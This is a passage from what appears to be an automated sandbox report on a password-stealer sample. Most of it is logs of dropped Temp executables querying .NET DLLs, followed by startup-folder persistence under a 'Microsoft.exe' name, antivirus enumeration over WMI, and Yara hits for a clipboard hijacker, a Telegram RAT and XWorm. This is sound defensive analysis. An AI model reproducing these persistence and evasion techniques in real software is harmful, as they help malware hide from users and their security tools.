                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.ThreadPool\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.ThreadPool.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Threading.Timer.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Timer\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Timer.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.ValueTuple.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ValueTuple\v4.0_4.0.0.0__cc7b13ffcd2ddd51\System.ValueTuple.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Web.ApplicationServices.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.ApplicationServices\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.ApplicationServices.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.DataVisualization.Design\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.DataVisualization.Design.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Web.DataVisualization.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.DataVisualization\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.DataVisualization.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Web.DynamicData.Design.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.DynamicData.Design\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.DynamicData.Design.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Web.DynamicData.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.DynamicData\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.DynamicData.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Web.Entity.Design.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Entity.Design\v4.0_4.0.0.0__b77a5c561934e089\System.Web.Entity.Design.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Web.Entity.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Entity\v4.0_4.0.0.0__b77a5c561934e089\System.Web.Entity.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions.Design\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.Design.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Web.Mobile.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Mobile\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.Mobile.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.RegularExpressions\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.RegularExpressions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Routing\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Routing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Web.Services.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Windows.Forms.DataVisualization.Design.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms.DataVisualization.Design\v4.0_4.0.0.0__31bf3856ad364e35\System.Windows.Forms.DataVisualization.Design.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Windows.Forms.DataVisualization.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms.DataVisualization\v4.0_4.0.0.0__31bf3856ad364e35\System.Windows.Forms.DataVisualization.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Workflow.Activities.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Workflow.ComponentModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Workflow.ComponentModel\v4.0_4.0.0.0__31bf3856ad364e35\System.Workflow.ComponentModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Workflow.Runtime.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Workflow.Runtime\v4.0_4.0.0.0__31bf3856ad364e35\System.Workflow.Runtime.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Xaml.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xaml\v4.0_4.0.0.0__b77a5c561934e089\System.Xaml.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Xaml.Hosting.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xaml.Hosting\v4.0_4.0.0.0__31bf3856ad364e35\System.Xaml.Hosting.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.XML.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Xml.Linq.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml.ReaderWriter\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Xml.ReaderWriter.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Xml.Serialization.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml.Serialization\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Serialization.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml.XDocument\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Xml.XDocument.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Xml.XmlDocument.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml.XmlDocument\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Xml.XmlDocument.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml.XPath\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Xml.XPath.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\webengine.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\webengine4.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WMINet_Utils.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WorkflowServiceHostPerformanceCounters.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\XamlBuildTask.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\XamlBuildTask\v4.0_4.0.0.0__31bf3856ad364e35\XamlBuildTask.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\XsdBuildTask.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\XsdBuildTask\v4.0_4.0.0.0__31bf3856ad364e35\XsdBuildTask.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ohvrxt.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ohvrxt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hgzxhw.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AdoNetDiag.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\alink.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Aspnet_perf.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrcompression.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clretwrc.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\compatjit.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Culture.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfdll.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\diasymreader.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EventLogMessages.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\FileTracker.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\fusion.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtilLib.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\ISymWrapper\v4.0_4.0.0.0__b03f5f7f11d50a3a\ISymWrapper.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\ISymWrapper\v4.0_4.0.0.0__b03f5f7f11d50a3a\ISymWrapper.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\ISymWrapper\v4.0_4.0.0.0__b03f5f7f11d50a3a\ISymWrapper.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Activities.Build.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Activities.Build\v4.0_4.0.0.0__31bf3856ad364e35\Microsoft.Activities.Build.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Conversion.v4.0\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Conversion.v4.0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Build.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Engine\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Tasks.v4.0\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Tasks.v4.0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Build.Utilities.v4.0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Utilities.v4.0\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Utilities.v4.0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Internal.Tasks.Dataflow.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.JScript.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.JScript\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Transactions.Bridge.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Transactions.Bridge\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Transactions.Bridge.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Transactions.Bridge.Dtc\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Transactions.Bridge.Dtc.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Transactions.Bridge.Dtc\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Transactions.Bridge.Dtc.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Transactions.Bridge.Dtc\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Transactions.Bridge.Dtc.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.VisualBasic.Activities.Compiler\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.Activities.Compiler.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.VisualBasic.Activities.Compiler\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.Activities.Compiler.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.VisualBasic.Compatibility.Data.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic.Compatibility.Data\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.Compatibility.Data.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic.Compatibility\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.Compatibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualC\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualC.Dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.VisualC.STLCLR.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualC.STLCLR\v4.0_2.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualC.STLCLR.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Win32.Primitives.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Win32.Primitives\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Win32.Primitives.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\hgzxhw.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Windows.ApplicationServer.Applications.dll VolumeInformation
                  Source: C:\Windows\System32\svchost.exeCode function: 2_2_00000142DB147960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00000142DB147960
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exeCode function: 16_2_00007FF7FE544AC0 memset,GetVersionExW,memset,GetSystemDirectoryW,lstrlenW,lstrlenW,LoadLibraryW,GetProcAddress,FreeLibrary,16_2_00007FF7FE544AC0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: jsc.exe, 00000003.00000002.3900986215.00000000012D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Clipboard Hijacker
                  Source: Yara matchFile source: 12.2.aspnet_wp.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.spczxf.exe.1a4c3fbeb00.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.spczxf.exe.1a4c3f601c8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.1738420103.000001A4C3F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: spczxf.exe PID: 2908, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: aspnet_wp.exe PID: 1340, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe PID: 432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: spczxf.exe PID: 2908, type: MEMORYSTR
                  Yara detected XWorm
                  Source: Yara matchFile source: 3.2.jsc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe.16e9aca9960.0.unpack, type: UNPACKEDPE
